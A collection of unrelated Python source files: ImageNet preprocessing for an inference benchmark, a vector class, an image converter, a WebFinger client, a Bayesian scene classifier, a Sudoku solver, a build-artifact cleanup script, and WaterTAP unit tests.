MODEL_INPUT_DATA_TYPE = os.getenv('ML_MODEL_INPUT_DATA_TYPE', 'float32')
MODEL_DATA_TYPE = os.getenv('ML_MODEL_DATA_TYPE', '(unknown)')
MODEL_USE_DLA = os.getenv('ML_MODEL_USE_DLA', 'NO') in ('YES', 'yes', 'ON', 'on', '1')
MODEL_MAX_BATCH_SIZE = int(os.getenv('ML_MODEL_MAX_BATCH_SIZE', BATCH_SIZE))
## Internal processing:
#
INTERMEDIATE_DATA_TYPE = np.float32 # default for internal conversion
#INTERMEDIATE_DATA_TYPE = np.int8 # affects the accuracy a bit
## Image normalization:
#
MODEL_NORMALIZE_DATA = os.getenv('ML_MODEL_NORMALIZE_DATA') in ('YES', 'yes', 'ON', 'on', '1')
MODEL_NORMALIZE_LOWER = float(os.getenv('ML_MODEL_NORMALIZE_LOWER', -1.0))
MODEL_NORMALIZE_UPPER = float(os.getenv('ML_MODEL_NORMALIZE_UPPER', 1.0))
SUBTRACT_MEAN = os.getenv('ML_MODEL_SUBTRACT_MEAN', 'YES') in ('YES', 'yes', 'ON', 'on', '1')
GIVEN_CHANNEL_MEANS = os.getenv('ML_MODEL_GIVEN_CHANNEL_MEANS', '')
if GIVEN_CHANNEL_MEANS:
GIVEN_CHANNEL_MEANS = np.fromstring(GIVEN_CHANNEL_MEANS, dtype=np.float32, sep=' ').astype(INTERMEDIATE_DATA_TYPE)
if MODEL_COLOURS_BGR:
GIVEN_CHANNEL_MEANS = GIVEN_CHANNEL_MEANS[::-1] # swapping Red and Blue colour channels
GIVEN_CHANNEL_STDS = os.getenv('ML_MODEL_GIVEN_CHANNEL_STDS', '')
if GIVEN_CHANNEL_STDS:
GIVEN_CHANNEL_STDS = np.fromstring(GIVEN_CHANNEL_STDS, dtype=np.float32, sep=' ').astype(INTERMEDIATE_DATA_TYPE)
if MODEL_COLOURS_BGR:
GIVEN_CHANNEL_STDS = GIVEN_CHANNEL_STDS[::-1] # swapping Red and Blue colour channels
## ImageNet dataset properties:
#
LABELS_PATH = os.environ['CK_CAFFE_IMAGENET_SYNSET_WORDS_TXT']
## Preprocessed input images' properties:
#
IMAGE_DIR = os.getenv('CK_ENV_DATASET_IMAGENET_PREPROCESSED_DIR')
IMAGE_LIST_FILE_NAME = os.getenv('CK_ENV_DATASET_IMAGENET_PREPROCESSED_SUBSET_FOF')
IMAGE_LIST_FILE = os.path.join(IMAGE_DIR, IMAGE_LIST_FILE_NAME)
IMAGE_DATA_TYPE = os.getenv('CK_ENV_DATASET_IMAGENET_PREPROCESSED_DATA_TYPE', 'uint8')
def load_labels(labels_filepath):
my_labels = []
input_file = open(labels_filepath, 'r')
for l in input_file:
my_labels.append(l.strip())
return my_labels
class_labels = load_labels(LABELS_PATH)
# Load preprocessed image filenames:
with open(IMAGE_LIST_FILE, 'r') as f:
image_list = [ s.strip() for s in f ]
def load_image_by_index_and_normalize(image_index):
img_file = os.path.join(IMAGE_DIR, image_list[image_index])
img = np.fromfile(img_file, np.dtype(IMAGE_DATA_TYPE))
img = img.reshape((MODEL_IMAGE_HEIGHT, MODEL_IMAGE_WIDTH, MODEL_IMAGE_CHANNELS))
if MODEL_COLOURS_BGR:
img = img[...,::-1] # swapping Red and Blue colour channels
if IMAGE_DATA_TYPE != 'float32':
img = img.astype(np.float32)
# Normalize
if MODEL_NORMALIZE_DATA:
img /= (255.0/(MODEL_NORMALIZE_UPPER-MODEL_NORMALIZE_LOWER))
img += MODEL_NORMALIZE_LOWER
# Subtract mean value
if len(GIVEN_CHANNEL_MEANS):
img -= GIVEN_CHANNEL_MEANS
elif SUBTRACT_MEAN:
img -= np.mean(img, axis=(0,1), keepdims=True)
if len(GIVEN_CHANNEL_STDS):
img /= GIVEN_CHANNEL_STDS
if MODEL_INPUT_DATA_TYPE == 'int8' or INTERMEDIATE_DATA_TYPE==np.int8:
img = np.clip(img, -128, 127).astype(INTERMEDIATE_DATA_TYPE)
if MODEL_DATA_LAYOUT == 'NCHW':
img = img.transpose(2,0,1)
elif MODEL_DATA_LAYOUT == 'CHW4':
img = np.pad(img, ((0,0), (0,0), (0,1)), 'constant')
# Add img to batch
return img.astype(MODEL_INPUT_DATA_TYPE)
def load_preprocessed_batch(image_list, image_index):
batch_data = None
for in_batch_idx in range(BATCH_SIZE):
img = load_image_by_index_and_normalize(image_index)
if batch_data is None:
batch_data = np.empty( (BATCH_SIZE, *img.shape), dtype=MODEL_INPUT_DATA_TYPE)
batch_data[in_batch_idx] = img
image_index += 1
#print('Data shape: {}'.format(batch_data.shape))
if MODEL_USE_DLA and MODEL_MAX_BATCH_SIZE>len(batch_data):
return np.pad(batch_data, ((0,MODEL_MAX_BATCH_SIZE-len(batch_data)), (0,0), (0,0), (0,0)), 'constant'), image_index
else:
return batch_data, image_index
|
import math
def n_length_vector(length,defaults=[],init=False):
class _vector:
def __init__(self,*args):
self.size = length
self.value = []
self.value.extend(expand_vectors(args))
if len(self.value) != self.size:
raise Exception(f'Can only specify {self.size} values for Vector[{self.size}], but {len(expand_vectors(args))} were given.')
self = None
def __repr__(self):
return f'Vector{self.size}({str(self.value).strip("[]")})'
__str__ = lambda s: s.__repr__()
def __neg__(self):
x = []
for i in self.value:
x.append(-i)
return n_length_vector(len(x),defaults=x,init=True)
def __pos__(self):
x = []
for i in self.value:
x.append(abs(i))
return n_length_vector(len(x),defaults=x,init=True)
def __add__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i+other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) > len(self.value):
x.append(0)
for i in range(len(x)):
try:
x[i] += other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __sub__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i-other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] -= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __mul__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i*other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] *= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __truediv__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i/other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] /= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __floordiv__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i//other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] //= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __mod__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i%other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] %= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __pow__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i**other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] **= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __lshift__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i<<other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] <<= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __rshift__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i>>other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] >>= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __and__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i&other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] &= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __or__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i|other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] |= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __xor__(self,other):
if type(other) == int or type(other) == float:
x = []
for i in self.value:
x.append(i^other)
return n_length_vector(len(x),defaults=x,init=True)
x = self.value.copy()
while len(x) < len(other.value):
x.append(0)
for i in range(len(x)):
try:
x[i] ^= other.value[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __invert__(self):
x = self.value.copy()
for i in range(len(x)):
try:
x[i] = ~x[i]
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __abs__(self):
x = self.value.copy()
for i in range(len(x)):
try:
x[i] = abs(x[i])
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __round__(self,length):
x = self.value.copy()
for i in range(len(x)):
try:
x[i] = round(x[i],length)
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __floor__(self):
x = self.value.copy()
for i in range(len(x)):
try:
x[i] = math.floor(x[i])
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __ceil__(self):
x = self.value.copy()
for i in range(len(x)):
try:
x[i] = math.ceil(x[i])
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __trunc__(self):
x = self.value.copy()
for i in range(len(x)):
try:
x[i] = math.trunc(x[i])
except:pass
return n_length_vector(len(x),defaults=x,init=True)
def __getitem__(self,item):
return self.value[item]
def __setitem__(self,item,value):
self.value[item] = value
def __iter__(self):
return iter(self.value.copy())
@property
def x(self):
return self.value[0]
@x.setter
def set_x(self,value):
self.value[0] = value
@property
def y(self):
return self.value[1]
@y.setter
def set_y(self,value):
self.value[1] = value
@property
def z(self):
return self.value[2]
@z.setter
def set_z(self,value):
self.value[2] = value
if init:
return _vector(*defaults)
return _vector
class _vectorPrefix:
def __getitem__(self,slice):
if not str(slice).isdigit():
raise SyntaxError(f'Unexpected "{slice}"')
return None
return n_length_vector(length=int(slice),init=False)
def expand_vectors(array):
out = []
for i in array:
if not type(i).__name__ == '_vector':
out.append(i)
else:
for j in i:
out.append(j)
return out
Vector = _vectorPrefix()
__all__ = ["Vector","expand_vectors"]
|
import sys
import os
from PIL import Image
import glob
#grab first and second argugments from commad line
def main(args):
if args:
img_folder = args[0]
new_img_folder = args[1]
#check whether the folder is already existed or not, if not create a new one
if os.path.exists(img_folder) and os.path.isdir(img_folder):
if not (os.path.exists(new_img_folder) and os.path.isdir(new_img_folder)):
os.mkdir(new_img_folder)
convert_jpg_to_png(img_folder, new_img_folder)
else:
print(f'There is no {img_folder} folder. Please try again.')
def convert_jpg_to_png(img_folder, new_img_folder):
#loop through Pokedex folder
for file in glob.iglob(img_folder+'/*.jpg'):
img = Image.open(file)
file_name = img.filename.strip(img_folder)[1:].strip('.jpg')
#convert images into PNG
#save it to the new folder
# img.save(new_img_folder + file_name + '.png', 'png')
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
#how to run (python name foldername newfoldername)
#python Project_JPG_to_PNG_converter.py pokedex/ pokedex/new |
"""
Taken from: https://github.com/jcarbaugh/python-webfinger
LICENSE:
Copyright (c) 2010, Jeremy Carbaugh
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Jeremy Carbaugh nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from xrd import XRD
import urllib, urllib2
RELS = {
'avatar': 'http://webfinger.net/rel/avatar',
'hcard': 'http://microformats.org/profile/hcard',
'open_id': 'http://specs.openid.net/auth/2.0/provider',
'portable_contacts': 'http://portablecontacts.net/spec/1.0',
'profile': 'http://webfinger.net/rel/profile-page',
'xfn': 'http://gmpg.org/xfn/11',
}
WEBFINGER_TYPES = (
'lrdd', # current
'http://lrdd.net/rel/descriptor', # deprecated on 12/11/2009
'http://webfinger.net/rel/acct-desc', # deprecated on 11/26/2009
'http://webfinger.info/rel/service', # deprecated on 09/17/2009
)
class WebFingerExpection(Exception):
pass
class WebFingerResponse(object):
def __init__(self, xrd):
self._xrd = xrd
def __getattr__(self, name):
if name in RELS:
return self._xrd.find_link(RELS[name], attr='href')
return getattr(self._xrd, name)
class WebFingerClient(object):
def __init__(self, host, secure=False):
self._host = host
self._secure = secure
self._opener = urllib2.build_opener(urllib2.HTTPRedirectHandler())
self._opener.addheaders = [('User-agent', 'python-webfinger')]
def _hm_hosts(self, xrd):
return [e.value for e in xrd.elements if e.name == 'hm:Host']
def xrd(self, url, raw=False):
conn = self._opener.open(url)
response = conn.read()
conn.close()
return response if raw else XRD.parse(response)
def hostmeta(self):
protocol = "https" if self._secure else "http"
hostmeta_url = "%s://%s/.well-known/host-meta" % (protocol, self._host)
return self.xrd(hostmeta_url)
def finger(self, username):
hm = self.hostmeta()
hm_hosts = self._hm_hosts(hm)
if self._host not in hm_hosts:
raise WebFingerExpection("hostmeta host did not match account host")
template = hm.find_link(WEBFINGER_TYPES, attr='template')
xrd_url = template.replace('{uri}',
urllib.quote_plus('acct:%s@%s' % (username, self._host)))
return WebFingerResponse(self.xrd(xrd_url))
def finger(identifier, secure=False):
if identifier.startswith('acct:'):
(acct, identifier) = identifier.split(':', 1)
(username, host) = identifier.split('@')
client = WebFingerClient(host, secure)
return client.finger(username)
# example main method
if __name__ == '__main__':
import sys
wf = finger(sys.argv[1], True)
print "Avatar: ", wf.avatar
print "HCard: ", wf.hcard
print "OpenID: ", wf.open_id
print "Profile:", wf.profile
print "XFN: ", wf.find_link('http://gmpg.org/xfn/11', attr='href')
|
import os
import sys
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
from src.classifier.bayesian_classifier import BayesianClassifier
from src.classifier.classify import classify
from src.classifier.subclasses import subclass, subclass_param_threshold
from src.images import ImageCollection, export_collection
from src.metrics.fisher_criterion import analyze_fisher_discriminant
from src.params.extract_param import *
from src.params.param import param_nd, param_remove_unused
import matplotlib.pyplot as plt
import pickle as pkl
from src.visualization import plot_sub_params
from skimage import color as skic
from src.images import rgb_to_cmyk
sys.path.append('../')
CDIR = os.path.dirname(os.path.realpath(__file__))
images_path = os.path.join(CDIR, '../baseDeDonneesImages')
# Load images
coast = ImageCollection(base_path=images_path, filter_name="coast")
forest = ImageCollection(base_path=images_path, filter_name="forest")
street = ImageCollection(base_path=images_path, filter_name="street")
categorized_collection = {"coast": coast, "forest": forest, "street": street}
param_labels = ['Moyenne Jaune', 'Médiane Bleu', 'Écart-type Vert', 'Moyenne Rouge', 'Moyenne Bleu',
'Moyenne Projection en Rouge', 'Écart-type de la luminosité']
# Extract parameters from images or load them from the .pkl
RELOAD_PARAMS = False
if RELOAD_PARAMS:
params = param_nd(categorized_collection, [(extractor_mean, {'dimension': 2, 'base_function': rgb_to_cmyk}),
(extractor_median, {'dimension': 2, }),
(extractor_std, {'dimension': 1, }),
(extractor_mean, {'dimension': 0, }),
(extractor_mean, {'dimension': 2, }),
(extractor_mean, {'dimension': 2, 'base_function': skic.rgb2yuv}),
(extractor_std, {'dimension': 2, 'base_function': skic.rgb2hsv})
], num_images=-1)
f = open("params.pkl", "wb")
pkl.dump(params, f)
f.close()
else:
f = open("params.pkl", "rb")
params = pkl.load(f)
f.close()
# Tuple of dimensions to visualize
view = (1, 3)
plot_sub_params(params, view, param_labels)
# Extract subclasses
params = subclass(params, 'coast', subclass_param_threshold, param_idx=5, threshold=0.05)
params = subclass(params, 'forest', subclass_param_threshold, param_idx=5, threshold=0.05)
# Visualization
plot_sub_params(params, view, param_labels, ellipsis=True)
analyze_fisher_discriminant(params)
# Create the classifier and classify images
bayes2 = BayesianClassifier(params, bins=10)
classify(params, bayes2.fit_multiple, likelihood='gaussian', visualize_errors_dims=view)
#export_collection({k: v['image_names'] for k, v in params.items()}, "collection.pkl")
# Plot bayes boundaries by creating a new classifier with only two of the original dimensions
params = param_remove_unused(params, [0, 1, 2, 5, 6])
bayes3 = BayesianClassifier(params, bins=10)
bayes3.display_decision_boundary((0, 1), likelihood='gaussian')
plt.show()
|
# Sudoku
import itertools
import re
from functools import reduce
from .csp import CSP
def flatten(seqs):
"""flatten(seqs)
Flattens objects in
"""
return sum(seqs, [])
easy1 = '..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..'
harder1 = '4173698.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'
def different_values_constraint(_A, a, _B, b):
"""A constraint saying two neighboring variables must differ in value."""
return a != b
class Sudoku(CSP):
"""A Sudoku problem.
The box grid is a 3x3 array of boxes, each a 3x3 array of cells.
Each cell holds a digit in 1..9. In each box, all digits are
different; the same for each row and column as a 9x9 grid.
>>> e = Sudoku(easy1)
Method infer_assignment shows the puzzle with all of the variables
that are currently assigned. Since we haven't inferred anything,
this shows the initial puzzle assignments that are given in the problem.
>>> e.display(e.infer_assignment())
. . 3 | . 2 . | 6 . .
9 . . | 3 . 5 | . . 1
. . 1 | 8 . 6 | 4 . .
------+-------+------
. . 8 | 1 . 2 | 9 . .
7 . . | . . . | . . 8
. . 6 | 7 . 8 | 2 . .
------+-------+------
. . 2 | 6 . 9 | 5 . .
8 . . | 2 . 3 | . . 9
. . 5 | . 1 . | 3 . .
AC3 will mutate the state of the puzzle to reduce variable domains as
much as possible by constraint propagation.
We see that the easy puzzle is solved by AC3.
>>> AC3(e); e.display(e.infer_assignment())
True
4 8 3 | 9 2 1 | 6 5 7
9 6 7 | 3 4 5 | 8 2 1
2 5 1 | 8 7 6 | 4 9 3
------+-------+------
5 4 8 | 1 3 2 | 9 7 6
7 2 9 | 5 6 4 | 1 3 8
1 3 6 | 7 9 8 | 2 4 5
------+-------+------
3 7 2 | 6 8 9 | 5 1 4
8 1 4 | 2 5 3 | 7 6 9
6 9 5 | 4 1 7 | 3 8 2
We could test if it was solved using Soduko's parent class goal_test method
s.goal_test(s.curr_domains)
True
This one is harder and AC3 does not help much at all:
>>> h = Sudoku(harder1)
Initial problem:
4 1 7 | 3 6 9 | 8 . 5
. 3 . | . . . | . . .
. . . | 7 . . | . . .
------+-------+------
. 2 . | . . . | . 6 .
. . . | . 8 . | 4 . .
. . . | . 1 . | . . .
------+-------+------
. . . | 6 . 3 | . 7 .
5 . . | 2 . . | . . .
1 . 4 | . . . | . . .
After AC3 constraint propagation
4 1 7 | 3 6 9 | 8 2 5
. 3 . | . . . | . . .
. . . | 7 . . | . . .
------+-------+------
. 2 . | . . . | . 6 .
. . . | . 8 . | 4 . .
. . . | . 1 . | . . .
------+-------+------
. . . | 6 . 3 | . 7 .
5 . . | 2 . . | . . .
1 . 4 | . . . | . . .
To solve this, we need to use backtracking_search which also mutates
the object given to it.
>>> solved = backtracking_search(h, select_unassigned_variable=mrv,
inference=forward_checking) is not None
If solved is True, the puzzle can be displayed with as above.
"""
R3 = list(range(3)) # All Sudoku puzzles use 3x3 grids, one side
# Generate board of fixed size 3x3 sets of 3x3 boxes
# Use Cell to generate integers for each box (variables are numbers)
Cell = itertools.count().__next__
def __init__(self, grid):
"""Build a Sudoku problem from a string representing the grid:
the digits 1-9 denote a filled cell, '.' or '0' an empty one;
other characters are ignored."""
# Build a grid of variables. Variables are numbered
# and the grid is 4 dimensional.
# Grid looks like the following:
# 00 01 02 | 09 10 11 | 18 19 20
# 03 04 05 | 12 13 14 | 21 22 23
# 06 07 08 | 15 16 17 | 24 25 26
# -------------------------------
# 27 28 29 | 36 ... | 45 ...
# 30 31 32 |
# 33 34 35 |
# -------------------------------
# 54 55 56 | 63 64 65 | 72 73 74
# 57 58 59 | 66 67 68 | 75 76 77
# 60 61 62 | 69 70 71 | 78 79 80
#
# self.bgrid[i][j] is a double list for a box.
# In the above variable set, the bottom right
# is self.bgrid[2][2]
# [[72, 73, 74], [75, 76, 77], [78, 79, 80]]
# The final two dimensions are the row and column
# within the box. self.bgrid[2][2][0][1] = 73
self.bgrid = [[
# one box
[[self.Cell() for _x in self.R3] for _y in self.R3]
# series of boxes bx, by
for _bx in self.R3
]
for _by in self.R3
]
# list of variables in each box, self.boxes[0] = [0, 1, ... 8]
self.boxes = flatten([list(map(flatten, brow)) for brow in self.bgrid])
# list of variables in each row
# self.rows[0] = [0, 1, 2, 9, 10, 11, 18, 19, 20]
self.rows = flatten([list(map(flatten, zip(*brow))) for brow in self.bgrid])
# list of variables in each column
self.cols = list(zip(*self.rows))
# Build the neighbors list
# It should be implemented as a dictionary.
# Keys are the variables names (numbers) and values are a set
# Each variable should have a set associated with it containing
# all of the variables that have constraints. As an example,
# if variable 100 had constraints between itself and variables
# 103 and 104, self.neighbors[100] would contain a set with members
# 103, and 104.
#
# See Python library reference if you are not familiar with sets
# Tutorial: https://www.learnpython.org/en/Sets
# Build dictionary of list of variables
self.neighbors = {v: set() for v in flatten(self.rows)}
# Populate with all variables that are neighbors of the
# unit.
for unit in map(set, self.boxes + self.rows + self.cols):
for v in unit:
self.neighbors[v].update(unit - {v})
squares = iter(re.findall(r'\d|\.', grid))
domains = {var: [ch] if ch in '123456789' else '123456789'
for var, ch in zip(flatten(self.rows), squares)}
for _ in squares:
raise ValueError("Not a Sudoku grid", grid) # Too many squares
CSP.__init__(self, None, domains, self.neighbors, different_values_constraint)
self.support_pruning()
def display(self, assignment):
def show_box(box): return [' '.join(map(show_cell, row)) for row in box]
def show_cell(cell): return str(assignment.get(cell, '.'))
def abut(lines1, lines2): return list(
map(' | '.join, list(zip(lines1, lines2))))
print('\n------+-------+------\n'.join(
'\n'.join(reduce(
abut, map(show_box, brow))) for brow in self.bgrid)) |
#!/usr/bin/env python
import argparse
import pathlib
CLEAN_EXTENSIONS = frozenset({'.c', '.pyc', '.so'})
def clean(root):
for path in root.iterdir():
if path.is_file() and path.suffix in CLEAN_EXTENSIONS:
path.unlink()
elif path.is_dir():
clean(path)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Recursively clean intermediate compile results.'
)
parser.add_argument('directory', help='root directory to operate on')
args = parser.parse_args()
clean(pathlib.Path(args.directory).resolve())
|
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Tests for general zero-order proeprty package
"""
import pytest
from idaes.core import (ControlVolume0DBlock,
EnergyBalanceType,
FlowsheetBlock,
MaterialBalanceType,
MaterialFlowBasis)
from idaes.core.util.model_statistics import (degrees_of_freedom,
fixed_variables_set,
activated_constraints_set,
unused_variables_set)
import idaes.core.util.scaling as iscale
from idaes.core.util.exceptions import ConfigurationError
import idaes.logger as idaeslog
from pyomo.environ import (ConcreteModel,
Expression,
Param,
Set,
units as pyunits,
Var)
from pyomo.util.check_units import (assert_units_consistent,
assert_units_equivalent)
from watertap.core import Database, WaterParameterBlock, WaterStateBlock
@pytest.fixture(scope="module")
def model():
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.water_props = WaterParameterBlock(
default={"solute_list": ["A", "B", "C"]})
return m
@pytest.mark.unit
def test_parameter_block(model):
assert isinstance(model.fs.water_props.component_list, Set)
for j in model.fs.water_props.component_list:
assert j in ["H2O", "A", "B", "C"]
assert isinstance(model.fs.water_props.solvent_set, Set)
for j in model.fs.water_props.solvent_set:
assert j in ["H2O"]
assert isinstance(model.fs.water_props.solute_set, Set)
for j in model.fs.water_props.solute_set:
assert j in ["A", "B", "C"]
assert isinstance(model.fs.water_props.phase_list, Set)
for j in model.fs.water_props.phase_list:
assert j in ["Liq"]
assert model.fs.water_props._state_block_class is WaterStateBlock
@pytest.mark.unit
def test_build_state_block(model):
model.fs.state = model.fs.water_props.build_state_block([0])
assert isinstance(model.fs.state, WaterStateBlock)
assert model.fs.state.component_list is model.fs.water_props.component_list
assert model.fs.state[0].component_list is \
model.fs.water_props.component_list
assert model.fs.state.phase_list is model.fs.water_props.phase_list
assert model.fs.state[0].phase_list is model.fs.water_props.phase_list
@pytest.mark.unit
def test_state_block_basic_attributes(model):
assert isinstance(model.fs.state[0].flow_mass_comp, Var)
# All variables are stale, so DoF should be 0
assert len(unused_variables_set(model.fs.state[0])) == 4
assert degrees_of_freedom(model.fs.state[0]) == 0
for p in model.fs.state[0].phase_list:
for j in model.fs.state[0].component_list:
assert (model.fs.state[0].get_material_flow_terms(p, j) is
model.fs.state[0].flow_mass_comp[j])
assert (model.fs.state[0].get_material_density_terms(p, j) is
model.fs.state[0].conc_mass_comp[j])
assert (model.fs.state[0].default_material_balance_type() is
MaterialBalanceType.componentTotal)
assert (model.fs.state[0].default_energy_balance_type() is
EnergyBalanceType.none)
assert (model.fs.state[0].define_state_vars() == {
"flow_mass_comp": model.fs.state[0].flow_mass_comp})
assert (model.fs.state[0].define_display_vars() == {
"Volumetric Flowrate": model.fs.state[0].flow_vol,
"Mass Concentration": model.fs.state[0].conc_mass_comp})
assert (model.fs.state[0].get_material_flow_basis() is
MaterialFlowBasis.mass)
@pytest.mark.unit
def test_state_block_other_properties(model):
assert isinstance(model.fs.state[0].dens_mass, Param)
assert isinstance(model.fs.state[0].conc_mass_comp, Expression)
assert isinstance(model.fs.state[0].flow_vol, Expression)
@pytest.mark.unit
def test_state_block_scaling(model):
# Set some new default scaling factors
model.fs.water_props.default_scaling_factor[("conc_mass_comp", "B")] = 5e-2
iscale.calculate_scaling_factors(model)
assert len(model.fs.state[0].scaling_factor) == 9
assert model.fs.state[0].scaling_factor[model.fs.state[0].flow_vol] == 1e3
assert model.fs.state[0].scaling_factor[
model.fs.state[0].conc_mass_comp["H2O"]] == 100
assert model.fs.state[0].scaling_factor[
model.fs.state[0].conc_mass_comp["A"]] == 100
assert model.fs.state[0].scaling_factor[
model.fs.state[0].conc_mass_comp["B"]] == 5e-2
assert model.fs.state[0].scaling_factor[
model.fs.state[0].conc_mass_comp["C"]] == 100
assert model.fs.state[0].scaling_factor[
model.fs.state[0].flow_mass_comp["H2O"]] == 1e5
assert model.fs.state[0].scaling_factor[
model.fs.state[0].flow_mass_comp["A"]] == 1e5
assert model.fs.state[0].scaling_factor[
model.fs.state[0].flow_mass_comp["B"]] == 1e5
assert model.fs.state[0].scaling_factor[
model.fs.state[0].flow_mass_comp["C"]] == 1e5
@pytest.mark.component
def test_unit_consistency(model):
assert_units_consistent(model)
for e in model.fs.state[0].flow_vol.values():
assert_units_equivalent(e, pyunits.m**3/pyunits.s)
for e in model.fs.state[0].conc_mass_comp.values():
assert_units_equivalent(e, pyunits.kg/pyunits.m**3)
@pytest.mark.component
def test_initialize_state_block(model):
orig_fixed_vars = fixed_variables_set(model)
orig_act_consts = activated_constraints_set(model)
flags = model.fs.state.initialize(hold_state=True)
assert degrees_of_freedom(model) == 0
inter_fixed_vars = fixed_variables_set(model)
for v in inter_fixed_vars:
assert v.name in ['fs.state[0].flow_mass_comp[H2O]',
'fs.state[0].flow_mass_comp[A]',
'fs.state[0].flow_mass_comp[B]',
'fs.state[0].flow_mass_comp[C]']
model.fs.state.release_state(flags)
fin_fixed_vars = fixed_variables_set(model)
fin_act_consts = activated_constraints_set(model)
assert len(fin_act_consts) == len(orig_act_consts)
assert len(fin_fixed_vars) == len(orig_fixed_vars)
for c in fin_act_consts:
assert c in orig_act_consts
for v in fin_fixed_vars:
assert v in orig_fixed_vars
@pytest.mark.component
def test_CV_integration(model):
model.fs.cv = ControlVolume0DBlock(default={
"property_package": model.fs.water_props})
model.fs.cv.add_geometry()
model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
model.fs.cv.add_material_balances(has_phase_equilibrium=True)
# No energy or momentum balances, as these are not supported.
@pytest.mark.unit
def test_no_solute_list_defined():
m = ConcreteModel()
